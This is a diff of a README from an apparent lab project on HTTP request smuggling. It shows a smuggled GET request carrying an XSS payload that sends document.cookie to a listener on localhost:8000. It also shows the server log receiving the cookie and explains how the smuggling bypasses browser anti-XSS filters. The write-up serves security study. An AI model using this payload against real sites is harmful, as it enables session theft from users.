zinzloun/lost-in-smuggling/README.md

     GET /contact.php?"><img src='http://localhost:8000/c.jpeg' onload=this.src='http://localhost:8000/?'+document.cookie> HTTP/1.1
     X:

 Here I used a classic payload to steal the user's cookie.
-Start a local python server, send the smuggled request a couple of time, then visiting a page on localhost you should see your cookie into the python server console:
+Start a local python server, send the smuggled request a couple of time, then visiting a page on localhost you should see your cookies coming into the python server console:

     127.0.0.1 - - [04/Jun/2024 15:44:16] "GET /c.jpeg HTTP/1.1" 304 -
     127.0.0.1 - - [04/Jun/2024 15:44:16] "GET /?{073ef109-18e5-44ae-acb5-e4ce8d598d15}=value HTTP/1.1" 200 -

 I also hosted an image to avoid using the onerror event that will continue to send the second request since a time out occurs.
-Please note that the application does not use any cookies, I manually added one just to test the procedure.
+Please note that the application does not use any cookies, I manually added one just to test the payload.
 ### Additional notes
 This payload worked on Firefox and Chrome (last release), sent through Burp Repeater.
 Sending the payload directly through these browsers, will result in an encoded query string parameter, due to the anti-XSS features present on the browser.
 That will stop our exploit to work, indeed the smuggled request permitted to us to bypass these protections completely.